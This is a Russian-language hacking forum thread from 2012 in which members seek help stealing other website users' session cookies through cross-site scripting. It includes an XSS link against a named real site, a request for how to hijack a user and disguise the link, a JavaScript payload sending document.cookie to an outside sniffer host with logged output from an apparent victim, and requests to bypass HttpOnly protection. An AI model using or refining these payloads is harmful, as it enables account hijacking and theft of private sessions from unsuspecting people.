HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 24.07.2012, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию

Смотря как обнаружил эту XSS.
 
Ответить с цитированием

  #152  
Старый 24.07.2012, 01:00
lex1094
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами: 7261526

Репутация: 0
По умолчанию

Цитата:

Сообщение от Nick Hander

Смотря как обнаружил эту XSS.

XSS обнаружена в форме ввода некоторых данных.
P.S. Можем в ICQ поговорить на эту тему?
 
Ответить с цитированием

  #153  
Старый 30.07.2012, 01:00
PollyWC
Новичок
Регистрация: 26.07.2012
Сообщений: 1
С нами: 7261526

Репутация: 0
По умолчанию

Привет! При использовании пассивки не приходят куки на сниффер. Нашел, что проблема в защите браузеров. Можно подробнее описать обход?
 
Ответить с цитированием

  #154  
Старый 31.07.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Ищи вектор под твой браузер, пробуй, экспериментируй: html5sec.org
 
Ответить с цитированием

  #155  
Старый 09.08.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Нашел XSS на сайте fc-zenit.ru
http://fc-zenit.ru/main/news/?ns=1&t...3C%2Fscript%3E

Объясните, что делать дальше с этим кодом? Если я хочу взломать пользователя сайта, то есть, угнать его куки, и как мне можно замаскировать код, можно ли сделать картинку заместо ссылки?
 
Ответить с цитированием

  #156  
Старый 24.08.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Статью перечитай. Там всё написано. Для тебя специально же писал.
 
Ответить с цитированием

  #157  
Старый 27.08.2012, 01:00
iHouse
Новичок
Регистрация: 24.08.2012
Сообщений: 2
С нами: 7219766

Репутация: 0
По умолчанию

снифер перезалей
 
Ответить с цитированием

  #158  
Старый 27.08.2012, 01:00
virtuoso_
Познающий
Регистрация: 09.03.2012
Сообщений: 51
С нами: 7461686

Репутация: 0
По умолчанию

Парни помогите обойти HttpOnly. Объясните по подробнее. Я прочитал пару статей на подобие этой http://raz0r.name/articles/httponly-bypass/ но все равно не чего не понял.
 
Ответить с цитированием

  #159  
Старый 31.10.2012, 01:00
ferluce666
Новичок
Регистрация: 21.04.2011
Сообщений: 1
С нами: 7926806

Репутация: 0
По умолчанию

Всем привет, подскажите чайнику, я отправляю человеку скрипт
img = new Image(); img.src = "http://httpz.ru/n6sy94cxrff.gif?"+document.cookie;

он по нему переходит а на снифер приходит следующее :
31.10.2012 11:50:50 +02:00 []
IP: empty
Query: empty
REFERER: http://m.odnoklassniki.ru/dk?st.cmd=...=link&tkn=5905
AGENT: Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.30362/28.2794; U; ru) Presto/2.8.119 Version/11.10 подскажите почему куки не приходят? что я делаю не правильно? заранее спасибо
 
Ответить с цитированием

  #160  
Старый 18.12.2012, 01:00
iHack3R
Участник форума
Регистрация: 09.10.2012
Сообщений: 146
С нами: 7153526

Репутация: 1
По умолчанию

Цитата:

Сообщение от Bugatti15047

Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?

JavaScript highlight

Код:
img =
new
Image
(); img.
src
=
"адрес сниффера?"
+
document
.
cookie
;
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.